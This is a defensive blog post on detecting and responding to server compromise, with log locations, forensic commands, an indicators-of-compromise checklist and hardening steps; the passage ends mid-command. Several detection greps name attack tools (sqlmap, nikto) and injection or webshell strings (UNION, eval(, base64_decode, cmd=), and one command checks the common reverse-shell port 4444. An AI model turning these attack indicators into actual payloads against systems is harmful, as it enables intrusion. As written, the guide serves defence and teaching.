DEV Community

Cover image for How to Know If a Threat Actor Has Accessed Your Server
Olawale Afuye
Olawale Afuye

Posted on

How to Know If a Threat Actor Has Accessed Your Server

1. Introduction

Every server connected to the internet is a target. It is not a question of if someone will attempt to access it without authorisation — it is a question of when, and whether you will detect it in time.

A server compromise occurs when an unauthorised party gains access to a system in a way that was not intended, permitted, or expected. This could range from a low-privilege attacker who merely explored your file system to a sophisticated threat actor who has maintained persistent access for months, exfiltrated data, and planted backdoors before you noticed anything unusual.

Normal vs. Suspicious vs. Confirmed Compromise

Understanding the difference between these three states is the foundation of any incident investigation.

State Description Example
Normal access Expected behaviour from known users, services, or automated systems Your deployment pipeline SSH-ing in as deploy at 2:00 AM
Suspicious access Anomalous activity that may or may not be malicious — requires investigation A root login from an unrecognised IP at 3:47 AM
Confirmed compromise Evidence of unauthorised access, malicious activity, or data breach A reverse shell process running as www-data; unknown SSH keys added

The critical skill is recognising the gap between "something looks off" and "we have been breached." Many teams either dismiss suspicious signals too quickly or panic at false positives. This guide will help you tell the difference — and act accordingly.


2. Common Signs a Threat Actor Accessed a Server

Before diving into log analysis, you need to know what you are looking for. The following indicators are the most common signals that something is wrong.

2.1 Unusual Login Attempts (SSH / RDP / API)

Brute-force attempts are often a precursor to or evidence of access. A high volume of failed logins followed by a single successful one is a textbook sign of a successful brute-force attack.

What to look for:

  • Multiple failed SSH attempts from the same or rotating IP addresses
  • Successful logins from geographic locations inconsistent with your team
  • Logins at unusual hours (3:00 AM when your team is in Lagos/London/NYC)
  • Logins from IPs flagged in threat intelligence databases (Shodan, AbuseIPDB)
  • API authentication tokens used from unexpected IP ranges

2.2 Unknown Users or Privilege Escalation

Attackers often create backdoor accounts or escalate privileges to maintain access.

What to look for:

  • New user accounts in /etc/passwd you did not create
  • Users added to sudo or the wheel group without authorisation
  • Changes to /etc/sudoers or /etc/sudoers.d/
  • A non-root user suddenly running processes as root
  • SUID/SGID binaries that were not there before

2.3 Unexpected Running Processes / Services

Malicious actors install tools — cryptominers, reverse shells, data exfiltration agents. These show up as unexpected processes.

What to look for:

  • Processes with random or disguised names (e.g., kworkerds, sysupdate, .init)
  • Processes listening on unusual ports
  • Unknown services registered with systemd or init.d
  • Processes consuming excessive CPU (often cryptominers)
  • Processes running as www-data, nginx, or other service accounts but performing non-service tasks

2.4 Modified System Files / Configurations

Attackers modify system files to maintain persistence or disable defences.

What to look for:

  • Changes to /etc/hosts (redirecting DNS)
  • Modified shell profiles: .bashrc, .bash_profile, .profile, /etc/profile.d/
  • Altered PAM configuration files (/etc/pam.d/)
  • Modified SSH server config (/etc/ssh/sshd_config) — e.g., PermitRootLogin yes added
  • Timestamp discrepancies on critical binaries (ls, ps, netstat, find)
  • Changes to web application files (index.php, config.js) — webshells

2.5 Unusual Outbound / Inbound Network Traffic

Data exfiltration and command-and-control (C2) communication create distinctive network patterns.

What to look for:

  • Large outbound data transfers to unknown IPs, especially at odd hours
  • Connections to known malicious IP ranges or Tor exit nodes
  • Unusual protocols or ports (IRC on port 6667, DNS tunnelling, ICMP data transfer)
  • New persistent connections to external IPs from service accounts
  • DNS queries to domains with high entropy (DGA — Domain Generation Algorithm)

2.6 High CPU, RAM, or Disk Usage Anomalies

Resource abuse is one of the most visible (and often first noticed) signs of compromise.

What to look for:

  • CPU usage consistently above 80–90% with no corresponding application load
  • Disk I/O spikes with no scheduled jobs running
  • Disk filling up rapidly with unexpected files
  • Memory exhaustion tied to an unknown process
  • Cryptomining malware is the most common cause — it is immediately visible in resource graphs

2.7 Disabled Security Tools or Logs

A sophisticated attacker's first action is often to blind your monitoring.

What to look for:

  • auditd, fail2ban, iptables, or ufw suddenly stopped or disabled
  • Log files that are empty, truncated, or have suspicious gaps
  • cron entries that pipe logs to /dev/null
  • Security agent (CrowdStrike, Wazuh, OSSEC) reporting offline
  • syslog daemon stopped or replaced

2.8 Unexpected Cron Jobs / Scheduled Tasks

Cron is a favourite persistence mechanism for attackers.

What to look for:

  • Entries in /var/spool/cron/crontabs/ you do not recognise
  • New files in /etc/cron.d/, /etc/cron.hourly/, /etc/cron.daily/
  • Cron jobs that download and execute scripts from external URLs
  • Windows: Scheduled Tasks created under \Microsoft\Windows\ in Task Scheduler
  • Systemd timers (systemctl list-timers) that are unexpected

2.9 New SSH Keys or Changed Credentials

Attackers plant SSH keys to ensure persistent re-entry even after passwords are changed.

What to look for:

  • New entries in ~/.ssh/authorized_keys for root or any user
  • New keys in /etc/ssh/authorized_keys (if configured globally)
  • SSH host keys regenerated (check /etc/ssh/ssh_host_*)
  • Changed /etc/passwd or /etc/shadow entries (password hash changes)
  • Cloud metadata service SSH key updates (AWS EC2 Instance Connect, GCP OS Login)

3. Where to Check — Logs & Evidence Sources

Once you suspect compromise, you need to know exactly where to look. Here is a comprehensive map of log locations and what each reveals.

3.1 Linux System Logs

Log File Location What It Contains
auth.log /var/log/auth.log (Debian/Ubuntu) SSH logins, sudo usage, PAM events
secure /var/log/secure (RHEL/CentOS/Amazon Linux) Same as auth.log for RPM-based distros
syslog /var/log/syslog General system messages, daemon activity
kern.log /var/log/kern.log Kernel events, unusual driver/module loads
wtmp /var/log/wtmp Binary log of all logins/logouts (read with last)
btmp /var/log/btmp Binary log of failed logins (read with lastb)
lastlog /var/log/lastlog Most recent login per user (read with lastlog)
audit.log /var/log/audit/audit.log System call auditing (if auditd is enabled)

Using journalctl (systemd-based systems):

# Show all logs from the past 24 hours
journalctl --since "24 hours ago"

# Show SSH service logs
journalctl -u ssh --since "2024-01-01" --until "2024-01-07"

# Show logs for a specific process ID
journalctl _PID=1234

# Show kernel messages
journalctl -k

# Follow logs in real time
journalctl -f

# Show logs with priority warning or higher
journalctl -p warning
Enter fullscreen mode Exit fullscreen mode

3.2 Windows Event Viewer

For Windows Server environments, the Event Viewer and wevtutil are your primary tools.

Event ID Meaning
4624 Successful logon
4625 Failed logon
4648 Logon using explicit credentials (pass-the-hash indicator)
4720 A user account was created
4728 / 4732 User added to security-enabled group
4756 User added to Universal group
4768 / 4769 Kerberos ticket request (AS-REQ / TGS-REQ)
4771 Kerberos pre-auth failure
7045 A new service was installed
4698 A scheduled task was created
# Query failed logons in the past hour
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625; StartTime=(Get-Date).AddHours(-1)}

# Query new service installations
Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045}

# Export security logs for offline analysis
wevtutil epl Security C:\forensics\security.evtx
Enter fullscreen mode Exit fullscreen mode

3.3 Web Server Logs

Web servers are frequent entry points via exploited applications, LFI, RFI, SQL injection, or webshells.

Nginx:

# Default access log
tail -f /var/log/nginx/access.log

# Look for POST requests to unusual paths (webshell access)
grep "POST" /var/log/nginx/access.log | grep -v "api\|login\|upload"

# Look for scanning patterns (many 404s from one IP)
awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20

# Look for unusual user agents (curl, python-requests, sqlmap)
grep -i "sqlmap\|nikto\|nmap\|masscan\|python-requests" /var/log/nginx/access.log
Enter fullscreen mode Exit fullscreen mode

Apache:

# Apache access log
tail -f /var/log/apache2/access.log

# Combined log format analysis
cat /var/log/apache2/access.log | awk '{print $9}' | sort | uniq -c | sort -rn
# Shows HTTP status code distribution — many 200s on unusual paths = webshell hits
Enter fullscreen mode Exit fullscreen mode

3.4 Cloud Audit Logs

In cloud environments, audit logs are your CCTV footage. Never ignore them.

AWS CloudTrail:

# Use AWS CLI to query CloudTrail events
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time 2024-01-01T00:00:00Z \
  --end-time 2024-01-07T00:00:00Z

# Look for root account usage (always suspicious)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=root

# Look for IAM changes
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateUser

# Look for security group changes (attacker opening ports)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AuthorizeSecurityGroupIngress
Enter fullscreen mode Exit fullscreen mode

GCP Audit Logs (via gcloud):

# View admin activity logs
gcloud logging read "logName=projects/YOUR_PROJECT/logs/cloudaudit.googleapis.com%2Factivity" \
  --limit 100 --format json

# Filter for IAM policy changes
gcloud logging read 'protoPayload.methodName="SetIamPolicy"' --limit 50
Enter fullscreen mode Exit fullscreen mode

Azure Monitor:

# Query sign-in logs for failures (Azure CLI)
az monitor activity-log list \
  --start-time 2024-01-01T00:00:00Z \
  --end-time 2024-01-07T00:00:00Z \
  --query "[?authorization.action=='Microsoft.Authorization/roleAssignments/write']"
Enter fullscreen mode Exit fullscreen mode

3.5 Firewall and WAF Logs

# iptables — view current rules
iptables -L -n -v

# View recent iptables drops (if logging enabled)
grep "iptables" /var/log/syslog | tail -50

# UFW logs
grep "UFW" /var/log/ufw.log | grep "BLOCK" | tail -50

# fail2ban — view currently banned IPs
fail2ban-client status sshd

# See all bans across all jails
fail2ban-client status
Enter fullscreen mode Exit fullscreen mode

3.6 Container and Kubernetes Logs

# Docker — view container logs
docker logs <container_id> --tail 200 --follow

# Inspect a running container's processes
docker top <container_id>

# Check for unexpected containers
docker ps -a

# Kubernetes — view pod logs
kubectl logs <pod-name> -n <namespace> --previous

# View Kubernetes audit log (if enabled)
kubectl get events --sort-by=.metadata.creationTimestamp -n kube-system

# Check for privileged pods (common escalation vector)
kubectl get pods --all-namespaces -o json | \
  jq '.items[] | select(.spec.containers[].securityContext.privileged==true) | .metadata.name'
Enter fullscreen mode Exit fullscreen mode

3.7 EDR and SIEM Alerts

If you have an endpoint detection and response (EDR) tool like CrowdStrike, SentinelOne, Wazuh, or a SIEM like Splunk or the Elastic Stack, these are your most powerful investigation tools.

Key queries to run in your SIEM:

# Splunk  find parent-child process anomalies (webshell execution)
index=endpoint | eval parent_child=parent_process+"-"+process_name
| stats count by parent_child | sort -count

# Elastic/Kibana KQL  find new privileged users
event.code: 4728 OR event.code: 4732

# Look for lateral movement (new SMB connections)
event.action: "network_connection" AND destination.port: 445
Enter fullscreen mode Exit fullscreen mode

4. Step-by-Step Investigation Playbook

When you have a suspected compromise, do not panic and do not immediately shut the server down — you may destroy forensic evidence. Follow this structured process.

┌─────────────────────────────────────────────────────────────────┐
│                  INCIDENT INVESTIGATION FLOW                    │
│                                                                 │
│  1. Confirm Indicators  →  2. Preserve Evidence                 │
│           ↓                        ↓                            │
│  3. Identify Access     →  4. Determine Attacker Actions        │
│     Vector                         ↓                            │
│           ↓                5. Check Persistence                 │
│  6. Scope Affected      ←          ↓                            │
│     Systems             ←  7. Reconstruct Timeline              │
└─────────────────────────────────────────────────────────────────┘
Enter fullscreen mode Exit fullscreen mode

Step 1 — Confirm Suspicious Indicators

Before escalating, verify that what you are seeing is genuinely anomalous. Cross-reference against:

  • Your deployment schedule (was that 3 AM login from your CI/CD pipeline?)
  • IP allow-lists and team VPN ranges
  • Recently onboarded engineers or contractors
  • Any known penetration tests or red team engagements

If after cross-referencing you cannot explain the activity, treat it as a confirmed incident.

Step 2 — Preserve Evidence

This is the most time-critical step. Evidence can be overwritten, logs can rotate, and memory is volatile.

# Create a forensics output directory
mkdir -p /tmp/forensics && cd /tmp/forensics

# Capture running processes snapshot
ps auxf > processes.txt

# Capture active network connections
ss -tulpn > network_connections.txt
netstat -tulpn >> network_connections.txt

# Capture logged-in users
who > who.txt
w >> who.txt
last -n 100 > last_logins.txt

# Dump current iptables rules
iptables-save > iptables_rules.txt

# Dump crontabs
crontab -l > root_cron.txt 2>/dev/null
for user in $(cut -f1 -d: /etc/passwd); do
  echo "=== $user ===" >> all_crontabs.txt
  crontab -u $user -l 2>/dev/null >> all_crontabs.txt
done

# Capture loaded kernel modules
lsmod > kernel_modules.txt

# Copy critical log files
cp /var/log/auth.log ./ 2>/dev/null || cp /var/log/secure ./ 2>/dev/null
cp /var/log/syslog ./ 2>/dev/null

# Take a memory dump (if avango or LiME is available)
# avml /tmp/forensics/memory.lime

# Hash all collected files for chain-of-custody
sha256sum * > evidence_hashes.txt
Enter fullscreen mode Exit fullscreen mode

Important: If possible, take an EBS/disk snapshot (AWS) or equivalent cloud snapshot before doing anything else. This preserves the entire disk state.

Step 3 — Identify the Initial Access Vector

How did they get in? Common vectors and where to look for each:

Vector Where to Look
Brute-forced SSH auth.log — many failed logins then success
Exploited web application Web server logs — unusual POST requests, error 500 spikes
Stolen credentials (leaked key) CloudTrail / IAM logs — access from unexpected IPs
Supply chain (compromised dependency) Application logs — unusual library behavior
Phishing → credential theft Email logs, browser forensics, SIEM identity events
Unpatched CVE Check process versions: nginx -v, python3 --version, etc.
Exposed S3 bucket / GCS bucket Cloud storage access logs
Misconfigured cloud metadata service SSRF logs, cloud audit logs for credential usage
# Check SSH login history for the first suspicious successful login
grep "Accepted" /var/log/auth.log | grep -v "YOUR_KNOWN_IPS"

# Check for web exploitation via suspicious HTTP methods/paths
grep -E "(UNION|SELECT|DROP|exec\(|eval\(|base64_decode|cmd=|exec=)" \
  /var/log/nginx/access.log

# Find recently created files (modified in last 7 days) — may reveal dropped payloads
find / -mtime -7 -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null | \
  grep -v "\.log$" | head -50
Enter fullscreen mode Exit fullscreen mode

Step 4 — Determine Attacker Actions (What Did They Do?)

Reconstruct what commands were run, what data was accessed, and what was changed.

# Check bash history for all users (attackers sometimes forget to clear it)
cat /root/.bash_history
for user in $(cut -f1 -d: /etc/passwd); do
  home=$(eval echo ~$user)
  if [ -f "$home/.bash_history" ]; then
    echo "=== History for $user ==="
    cat "$home/.bash_history"
  fi
done

# Check if history was cleared (a sign of an attacker)
# An empty .bash_history with a recent mtime is suspicious
ls -la /root/.bash_history

# Check recently accessed files
find / -atime -1 -type f -not -path "/proc/*" 2>/dev/null | head -30

# Check audit logs for specific commands (if auditd was running)
ausearch -i -m execve --start recent

# Look for outbound connections that occurred
grep "ESTABLISHED\|SYN_SENT" /tmp/forensics/network_connections.txt
Enter fullscreen mode Exit fullscreen mode

Step 5 — Check Persistence Mechanisms

Attackers leave backdoors. Find them all before remediation.

# ── SSH Keys ──────────────────────────────────────────────────────
# Check all users' authorized_keys files
find /home /root /etc -name "authorized_keys" 2>/dev/null -exec cat {} \; -print

# ── Cron Jobs ─────────────────────────────────────────────────────
ls -la /etc/cron* /var/spool/cron/crontabs/
cat /etc/cron.d/*

# ── Systemd Services ──────────────────────────────────────────────
systemctl list-units --type=service --state=running | grep -v "^UNIT"
# Look for unfamiliar service names
find /etc/systemd/system/ -name "*.service" -newer /etc/passwd

# ── Web Shells ────────────────────────────────────────────────────
# Find PHP webshells (eval, system, exec functions)
find /var/www /srv /opt -name "*.php" -exec grep -l "eval\|system\|exec\|base64_decode" {} \;

# ── SUID Binaries (privilege escalation tools) ────────────────────
find / -perm -4000 -type f -not -path "/proc/*" 2>/dev/null

# ── Startup Scripts ───────────────────────────────────────────────
ls -la /etc/rc.local /etc/rc*.d/ /etc/init.d/
cat /etc/rc.local

# ── LD_PRELOAD Hijacking ──────────────────────────────────────────
cat /etc/ld.so.preload 2>/dev/null
env | grep LD_PRELOAD
Enter fullscreen mode Exit fullscreen mode

Step 6 — Scope Affected Systems

Did the attacker move laterally?

# Check for other hosts this server connects to
cat ~/.ssh/known_hosts
cat /etc/hosts
arp -n  # Other hosts in the LAN

# Look for lateral movement via SSH from this server
grep "Accepted\|publickey\|password" /var/log/auth.log | grep "from"

# Check for any cloud API calls that may have been made from this server
grep "aws\|gcloud\|az " /root/.bash_history

# Review AWS IAM credentials used from this instance
# If this is an EC2 with an IAM role, check CloudTrail for calls made by this instance's role
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=ResourceName,AttributeValue=i-YOUR_INSTANCE_ID
Enter fullscreen mode Exit fullscreen mode

Step 7 — Timeline Reconstruction

Build a precise timeline of events to understand the full scope.

# Create a unified timeline using log2timeline/plaso (forensics tool)
# Install: pip install plaso
log2timeline.py /tmp/timeline.plaso /var/log/

# Or manually using timestamps from logs
# Combine auth.log, syslog, and web logs sorted by timestamp
cat /var/log/auth.log /var/log/syslog /var/log/nginx/access.log | \
  sort -k1,3 > /tmp/forensics/unified_timeline.txt

# Find file modifications around the suspected breach time
# Example: if breach suspected around 2024-01-15 03:00 UTC
find / -newermt "2024-01-15 02:00" ! -newermt "2024-01-15 06:00" \
  -type f -not -path "/proc/*" 2>/dev/null
Enter fullscreen mode Exit fullscreen mode

5. Useful Commands & Tools

5.1 Login and Session Investigation

# ── last ──────────────────────────────────────────────────────────
# Shows login history: user, TTY, source IP, date/time, duration
last -n 50 -a  # -a shows hostname/IP in last column

# ── lastlog ───────────────────────────────────────────────────────
# Shows the most recent login for every account on the system
# Useful for spotting accounts that should never log in (www-data, daemon)
lastlog

# Filter to show only accounts that HAVE logged in
lastlog | grep -v "Never logged in"

# ── who ───────────────────────────────────────────────────────────
# Shows who is currently logged in
who -a  # -a shows all info including run-level and system boot time

# ── w ─────────────────────────────────────────────────────────────
# Like who, but also shows what command each logged-in user is running
w
Enter fullscreen mode Exit fullscreen mode

5.2 Process Investigation

# ── ps aux ────────────────────────────────────────────────────────
# Full process listing: user, PID, CPU%, MEM%, command
ps aux

# Sort by CPU usage (find cryptominers)
ps aux --sort=-%cpu | head -20

# Sort by memory usage
ps aux --sort=-%mem | head -20

# Show process tree (reveals parent-child relationships — key for detecting shells)
ps auxf

# ── pstree ────────────────────────────────────────────────────────
# Visual process tree — attackers' reverse shells usually appear as children of web processes
pstree -aup

# ── lsof ──────────────────────────────────────────────────────────
# List all open files and network connections by process
lsof -i  # Show all network connections

# Show what process is using a specific port
lsof -i :4444  # 4444 is a common reverse shell port

# Show all files opened by a specific process
lsof -p <PID>

# Show deleted files that are still open (attacker may have deleted malware but it's still running)
lsof | grep deleted
Enter fullscreen mode Exit fullscreen mode

5.3 Network Investigation

# ── netstat ───────────────────────────────────────────────────────
# Show all listening ports and established connections
netstat -tulpn   # -t TCP, -u UDP, -l listening, -p show PID, -n numeric

# Show all established connections
netstat -an | grep ESTABLISHED

# ── ss ────────────────────────────────────────────────────────────
# Faster modern replacement for netstat
ss -tulpn        # Same flags as netstat
ss -tnp          # Show TCP connections with process names

# Find processes with unexpected external connections
ss -tnp | grep -v "127.0.0.1\|::1\|YOUR_KNOWN_IPS"
Enter fullscreen mode Exit fullscreen mode

5.4 File System Forensics

# ── find with -mtime ──────────────────────────────────────────────
# Find files modified in the last N days
find / -mtime -1 -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null

# Find files modified within a specific time range
find /var/www -newermt "2024-01-15 00:00" ! -newermt "2024-01-16 00:00" -type f

# Find files with unusual permissions (world-writable)
find / -perm -o+w -type f -not -path "/proc/*" 2>/dev/null

# Find SUID/SGID binaries
find / -type f \( -perm -4000 -o -perm -2000 \) -not -path "/proc/*" 2>/dev/null

# Find hidden files and directories
find / -name ".*" -type f -not -path "/proc/*" -not -path "/home/*/.bash*" 2>/dev/null | head -30
Enter fullscreen mode Exit fullscreen mode

5.5 Rootkit Detection

# ── chkrootkit ────────────────────────────────────────────────────
# Scans for known rootkits by checking system binaries and /proc
# Install: apt install chkrootkit OR yum install chkrootkit
chkrootkit

# Run in quiet mode (only show positive findings)
chkrootkit -q

# ── rkhunter ──────────────────────────────────────────────────────
# More comprehensive: checks binaries, rootkits, backdoors, config
# Install: apt install rkhunter
rkhunter --update          # Update database first
rkhunter --check           # Full system scan
rkhunter --check --rwo     # Only show warnings
Enter fullscreen mode Exit fullscreen mode

5.6 System Auditing

# ── auditd ────────────────────────────────────────────────────────
# The Linux Audit Framework — records system calls
# Install: apt install auditd  OR  yum install audit

# Start and enable
systemctl enable auditd && systemctl start auditd

# Add watch rules (add to /etc/audit/rules.d/audit.rules)
# Watch for writes to /etc/passwd
auditctl -w /etc/passwd -p wa -k passwd_change

# Watch for execution of suspicious binaries
auditctl -w /tmp -p x -k tmp_exec
auditctl -w /bin/bash -p x -k bash_exec

# Search audit log for specific events
ausearch -k passwd_change  # Find events matching our watch key
ausearch -m execve --start today  # All exec calls today
ausearch -x /bin/bash --start yesterday  # Bash executions yesterday

# Generate a human-readable audit report
aureport --summary
aureport --login --failed  # Failed logins
aureport --exec            # Execution events

# ── fail2ban ──────────────────────────────────────────────────────
# Monitors logs and bans IPs after repeated failures
# Install: apt install fail2ban
systemctl status fail2ban

# Check active bans
fail2ban-client status
fail2ban-client status sshd

# View banned IPs
fail2ban-client banned

# Manually ban an IP
fail2ban-client set sshd banip 203.0.113.42

# Check if a specific IP is banned
fail2ban-client get sshd banip
Enter fullscreen mode Exit fullscreen mode

6. Indicators of Compromise (IoC) Checklist

Use this checklist during an active investigation. Check each item and record your findings.

# Indicator Where to Check Status
1 New or unrecognised user accounts /etc/passwd, cat /etc/shadow
2 Users added to sudo / wheel group /etc/sudoers, getent group sudo
3 Unrecognised SSH authorized_keys ~/.ssh/authorized_keys (all users)
4 Unexpected successful SSH logins /var/log/auth.log or secure
5 Logins from unexpected IPs or geos last -a, CloudTrail / audit logs
6 Unknown or high-CPU processes ps aux --sort=-%cpu
7 Processes listening on unexpected ports ss -tulpn, netstat -tulpn
8 Unexpected outbound connections ss -tnp, firewall logs
9 Unknown or modified cron jobs crontab -l, /etc/cron.d/
10 Unknown systemd services systemctl list-units --type=service
11 Modified system binaries (ls, ps, etc.) rkhunter, debsums, rpm -Va
12 Webshells in web root find /var/www -name "*.php" -exec grep -l eval {} \;
13 SUID binaries not in baseline find / -perm -4000
14 Modified /etc/hosts or DNS config cat /etc/hosts, cat /etc/resolv.conf
15 Modified SSH server config cat /etc/ssh/sshd_config
16 Modified PAM config ls -la /etc/pam.d/
17 Disabled or stopped security tools systemctl status auditd fail2ban
18 Gaps or tampering in log files ls -la /var/log/, check file sizes and timestamps
19 Unusual files in /tmp, /dev/shm, /var/tmp ls -la /tmp/ /dev/shm/ /var/tmp/
20 Unexpected kernel modules loaded `lsmod grep -v "^Module"`
21 New firewall rules (ports opened) iptables -L -n, cloud security group logs
22 Cloud IAM changes or new API keys CloudTrail, GCP Audit Logs, Azure Monitor
23 Data exfiltration (large outbound transfers) Network flow logs, VPC Flow Logs
24 Rootkit detection findings chkrootkit -q, rkhunter --check --rwo
25 Modified .bashrc / .profile entries cat /root/.bashrc, cat ~/.bash_profile

7. Immediate Response Actions

Once compromise is confirmed, act decisively and in the right order.

7.1 Isolate the Server

Goal: stop the bleeding without destroying evidence.

# Option A: Block all inbound/outbound traffic except your investigation IP
iptables -I INPUT -s YOUR_IP/32 -j ACCEPT
iptables -I OUTPUT -d YOUR_IP/32 -j ACCEPT
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

# Option B: AWS — modify the security group to deny all traffic
aws ec2 revoke-security-group-ingress \
  --group-id sg-XXXX \
  --protocol all \
  --cidr 0.0.0.0/0

# Option C: Cloud-level — move to an isolated VPC / detach from load balancer
# Do this via your cloud console to avoid SSH lockout
Enter fullscreen mode Exit fullscreen mode

In cloud environments, snapshot the disk before isolating so you have a forensic copy.

7.2 Kill Malicious Sessions

# View active sessions
who
w

# Kill a specific session (use PTS from `who` output)
pkill -kill -t pts/1

# Kill a specific process (use PID from ps aux)
kill -9 <PID>

# Kill all processes by a suspicious user
pkill -u suspicioususer
Enter fullscreen mode Exit fullscreen mode

7.3 Rotate All Credentials

This must be done after isolation, not before — rotating credentials while the attacker is connected may alert them and cause destructive action.

# Rotate SSH keys for all users — remove unauthorized keys first
# Edit ~/.ssh/authorized_keys and remove unknown entries
# Then generate new keys for your team
ssh-keygen -t ed25519 -C "new_key_post_incident_$(date +%F)"

# Rotate system user passwords
passwd root
passwd <other_users>

# AWS — rotate IAM access keys
aws iam create-access-key --user-name YOUR_USER
aws iam delete-access-key --user-name YOUR_USER --access-key-id OLD_KEY_ID

# Rotate database passwords
# PostgreSQL example:
psql -U postgres -c "ALTER USER appuser WITH PASSWORD 'new_strong_password';"

# Rotate API keys, webhook secrets, and JWT secrets in your application
# Update environment variables / secrets manager entries
Enter fullscreen mode Exit fullscreen mode

7.4 Patch the Exploited Vulnerability

# Update all packages (Ubuntu/Debian)
apt update && apt upgrade -y

# Update all packages (RHEL/CentOS/Amazon Linux)
yum update -y  # or: dnf update -y

# If a specific CVE was exploited, patch that component first
# Example: if OpenSSH was vulnerable
apt install --only-upgrade openssh-server

# Check current versions
nginx -v
openssl version
python3 --version
node --version
Enter fullscreen mode Exit fullscreen mode

7.5 Restore from Backups

If system files, application code, or databases were modified:

# Identify what changed using your baseline or last known-good snapshot
# Compare current file hashes against baseline
md5sum /usr/bin/ls /bin/bash /sbin/sshd > current_hashes.txt
diff baseline_hashes.txt current_hashes.txt

# Restore specific files from backup
rsync -avz backup_server:/backups/latest/etc/ /etc/

# Or restore the entire server from a pre-incident snapshot
# (AWS: restore from AMI or EBS snapshot taken before incident)
Enter fullscreen mode Exit fullscreen mode

7.6 Notify Stakeholders

Incident communication is as important as technical response.

Internal notifications:

  • CTO / Engineering Lead — immediately upon confirmed compromise
  • Legal and Compliance — if any user data may have been accessed (GDPR, NDPR, etc.)
  • On-call team — to mobilise support

External notifications (if applicable):

  • Affected customers — if PII, payment data, or health data was exposed
  • Data protection authorities — GDPR requires notification within 72 hours
  • Cyber insurance provider — if you have a policy
  • Law enforcement — for significant breaches or nation-state activity

8. Prevention Best Practices

Detection and response matter — but prevention is always cheaper than incident response.

8.1 Multi-Factor Authentication (MFA)

Enable MFA on every access point:

# Install Google Authenticator PAM module for SSH MFA
apt install libpam-google-authenticator

# Configure PAM for SSH
echo "auth required pam_google_authenticator.so" >> /etc/pam.d/sshd

# Enforce in sshd_config
echo "ChallengeResponseAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthenticationMethods publickey,keyboard-interactive" >> /etc/ssh/sshd_config
systemctl restart sshd
Enter fullscreen mode Exit fullscreen mode

8.2 Enforce Least Privilege

# Audit sudo access — nobody should have NOPASSWD unless absolutely necessary
grep -r "NOPASSWD" /etc/sudoers /etc/sudoers.d/

# Lock down SSH — disable root login and password authentication
cat >> /etc/ssh/sshd_config << EOF
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
AllowUsers deploy ubuntu YOUR_USER  # Whitelist only needed users
EOF
systemctl restart sshd
Enter fullscreen mode Exit fullscreen mode

8.3 Patch Management

Unpatched software is the leading cause of compromise. Automate updates:

# Ubuntu — enable automatic security updates
apt install unattended-upgrades
dpkg-reconfigure --priority=low unattended-upgrades

# Set to auto-apply security patches only
cat > /etc/apt/apt.conf.d/50unattended-upgrades << EOF
Unattended-Upgrade::Allowed-Origins {
    "${distro_id}:${distro_codename}-security";
};
Unattended-Upgrade::Automatic-Reboot "false";
EOF
Enter fullscreen mode Exit fullscreen mode

8.4 Log Monitoring and Alerting

┌─────────────────────────────────────────────────────────────────┐
│                   LOGGING ARCHITECTURE                          │
│                                                                 │
│  Server Logs  ──►  Log Aggregator  ──►  SIEM / Alerting        │
│  (auth.log,        (Fluentd,             (Elastic/Kibana,       │
│   syslog,           Filebeat,             Splunk, Datadog,      │
│   nginx.log)        Logstash)             Wazuh)                │
│                                                ↓                │
│                                        Alert Rules              │
│                                        - Root login             │
│                                        - New user created       │
│                                        - Port scan detected     │
│                                        - Auth failure spike     │
└─────────────────────────────────────────────────────────────────┘
Enter fullscreen mode Exit fullscreen mode

Configure alerts for at minimum:

  • Root logins
  • New user creation or privilege escalation
  • SSH login failures exceeding threshold (e.g., >10 in 60 seconds)
  • Successful logins from new/unknown IP addresses
  • Security service failures (auditd stopped, fail2ban stopped)

8.5 Intrusion Detection (IDS/IPS)

# Install and configure Wazuh agent (open-source HIDS/SIEM)
# Wazuh monitors files, logs, processes, and vulnerabilities in real time
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
echo "deb https://packages.wazuh.com/4.x/apt/ stable main" \
  | tee /etc/apt/sources.list.d/wazuh.list
apt update && apt install wazuh-agent

# Configure Wazuh manager connection
sed -i "s|MANAGER_IP|YOUR_WAZUH_MANAGER_IP|g" /var/ossec/etc/ossec.conf
systemctl enable wazuh-agent && systemctl start wazuh-agent
Enter fullscreen mode Exit fullscreen mode

8.6 File Integrity Monitoring (FIM)

# AIDE — Advanced Intrusion Detection Environment
apt install aide

# Initialize the AIDE database (baseline snapshot)
aideinit
cp /var/lib/aide/aide.db.new /var/lib/aide/aide.db

# Run a check (compare current state to baseline)
aide --check

# Automate daily checks
echo "0 2 * * * root /usr/bin/aide --check | mail -s 'AIDE Report' security@yourcompany.com" \
  >> /etc/crontab
Enter fullscreen mode Exit fullscreen mode

8.7 Backup Strategy

┌─────────────────────────────────────────────────────┐
│              THE 3-2-1 BACKUP RULE                  │
│                                                     │
│  3  copies of your data                             │
│  2  different storage media/services                │
│  1  copy offsite / air-gapped                       │
│                                                     │
│  For cloud servers:                                 │
│  ─ Daily automated EBS snapshots                    │
│  ─ Weekly cross-region backup copy                  │
│  ─ Monthly export to immutable cold storage         │
│  ─ Test restores quarterly                          │
└─────────────────────────────────────────────────────┘
Enter fullscreen mode Exit fullscreen mode

8.8 Harden Your Attack Surface

# Disable unused services
systemctl list-units --type=service --state=running
systemctl disable --now bluetooth avahi-daemon cups  # Examples of unneeded services

# Close unused ports with UFW
ufw default deny incoming
ufw default allow outgoing
ufw allow 22/tcp    # SSH
ufw allow 443/tcp   # HTTPS
ufw allow 80/tcp    # HTTP
ufw enable

# Disable IPv6 if not needed
echo "net.ipv6.conf.all.disable_ipv6 = 1" >> /etc/sysctl.conf
sysctl -p

# Restrict access to the metadata service (AWS IMDS v2 only)
aws ec2 modify-instance-metadata-options \
  --instance-id i-YOUR_INSTANCE_ID \
